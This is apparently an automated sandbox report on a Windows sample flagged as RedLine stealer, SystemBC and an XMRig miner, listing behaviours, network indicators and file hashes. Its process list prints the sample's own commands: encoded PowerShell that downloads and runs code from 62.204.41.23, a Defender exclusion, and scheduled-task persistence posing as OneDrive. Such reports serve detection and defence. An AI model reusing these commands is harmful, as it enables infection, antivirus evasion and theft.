Malware Analysis Report

2025-04-03 09:46

Sample ID 230506-y9jvrsbg46
Target 0e4e3cdacfbe29fdc3e189e52ee8228e.exe
SHA256 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84
Tags
redline systembc xmrig infostealer miner persistence stealer trojan
score
10/10

Analysis Overview

Threat Level: Known bad

The file 0e4e3cdacfbe29fdc3e189e52ee8228e.exe was found to be: Known bad.

Malicious Activity Summary

Detects Redline Stealer samples

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

SystemBC

RedLine

XMRig Miner payload

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-06 20:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-06 20:29

Reported

2023-05-06 20:37

Platform

win7-20230220-en

Max time kernel

131s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1800 set thread context of 556 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1800 set thread context of 1412 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1340 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1340 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 1796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1704 wrote to memory of 1480 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 860 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1704 wrote to memory of 2032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 988 wrote to memory of 1632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2040 wrote to memory of 1596 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 920 wrote to memory of 1800 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 2040 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1540 wrote to memory of 268 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 1448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1540 wrote to memory of 1624 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1800 wrote to memory of 556 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1800 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1708 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1708 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\system32\taskeng.exe

taskeng.exe {A8F10B29-F43F-4D1C-BC67-A54E08F3A561} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 22:40 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1391.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.43:80 pool.hashvault.pro tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9617b66fe0df3d853bd99325930c345c
SHA1 4cab6df7c4aeb0609c417408d751e65f5f918d47
SHA256 7676b8816f31a7c148c90402c6b1a3e66757cdc1bc6874409b3c54db530d6ba8
SHA512 4208d6b4e1165cee674db2a987dcf1e6a24860dd536ed2a80270439a42da3bf65cbaaf93452370d1504e8490625f25c0876aefd23617ee7892123b1482efed87

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9617b66fe0df3d853bd99325930c345c
SHA1 4cab6df7c4aeb0609c417408d751e65f5f918d47
SHA256 7676b8816f31a7c148c90402c6b1a3e66757cdc1bc6874409b3c54db530d6ba8
SHA512 4208d6b4e1165cee674db2a987dcf1e6a24860dd536ed2a80270439a42da3bf65cbaaf93452370d1504e8490625f25c0876aefd23617ee7892123b1482efed87

memory/1708-135-0x00000000001C0000-0x00000000005E0000-memory.dmp

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1016-138-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1016-140-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1016-139-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1596-141-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1800-142-0x000000013FD10000-0x00000001406DA000-memory.dmp

memory/1708-143-0x00000000001C0000-0x00000000005E0000-memory.dmp

memory/1708-144-0x00000000001C0000-0x00000000005E0000-memory.dmp

memory/1708-145-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/1800-149-0x000000013FD10000-0x00000001406DA000-memory.dmp

memory/1412-150-0x0000000000040000-0x0000000000060000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Temp\tmp1391.tmp.bat

MD5 0c47727603dcd8c9535e535ef622f0dc
SHA1 54c488615a29834b97b64e2ce20a43f0287abffe
SHA256 43e6ecdf78f3ec54839ebfb1107ed8871953730db7a27b126911442a8aca526e
SHA512 6d63d55382c671b0a1da67829536f2b4329e652237e00dba8a6f5ae86dccd384696f2d4b90c0c0a32ea5fd2cf0143a96e01af1bb0bffacc55c2fdfdd42b2941d

memory/1668-167-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1668-168-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1708-169-0x00000000001C0000-0x00000000005E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp1391.tmp.bat

MD5 0c47727603dcd8c9535e535ef622f0dc
SHA1 54c488615a29834b97b64e2ce20a43f0287abffe
SHA256 43e6ecdf78f3ec54839ebfb1107ed8871953730db7a27b126911442a8aca526e
SHA512 6d63d55382c671b0a1da67829536f2b4329e652237e00dba8a6f5ae86dccd384696f2d4b90c0c0a32ea5fd2cf0143a96e01af1bb0bffacc55c2fdfdd42b2941d

memory/1668-172-0x0000000005E60000-0x0000000005EA0000-memory.dmp

memory/1668-171-0x0000000000B40000-0x0000000000F60000-memory.dmp

C:\Users\Admin\Desktop\DebugPublish.txt

MD5 398fdfdd239cf5138e7cf3957564c598
SHA1 d7604a7d7d8a74db27bfe28c010018e4bea62e76
SHA256 c634e599760b3df74e50dce9376fcd57fd4f233abc88aa9df78fe6e1ff92ba86
SHA512 a170ac75f27f070823c94152e94726a03d7ec1c5a781ff94bdfe5d145897093a7bc0ae5c83d1740f066c6a7a25b6d32e9f348bf14d868145afa684cb4956905d

C:\Users\Admin\Desktop\SuspendRedo.txt

MD5 25d1e0d1440768a9b8a914eea5b36fcc
SHA1 2596b9349d41607f13715bd1f252a481e3d953b8
SHA256 79d2eae0bf763deefb4c0520428a176ed3eba5abd4d4362c2480b123394c8a62
SHA512 24093f065662a458ec1601c1dbd3ff186d2bbf4c4220bf6726256214d91c2241755822206c8c03e39064e39379744421b7cca58851b20a7159dca0eb2abb73e1

memory/1412-221-0x0000000001FB0000-0x0000000001FD0000-memory.dmp

memory/556-229-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1412-230-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-231-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/556-233-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1412-234-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-235-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1668-236-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-237-0x0000000001FB0000-0x0000000001FD0000-memory.dmp

memory/1412-240-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-241-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-244-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-245-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-248-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-249-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-251-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-253-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-255-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-257-0x0000000000B40000-0x0000000000F60000-memory.dmp

memory/1412-259-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1668-261-0x0000000000B40000-0x0000000000F60000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 20:29

Reported

2023-05-06 20:37

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
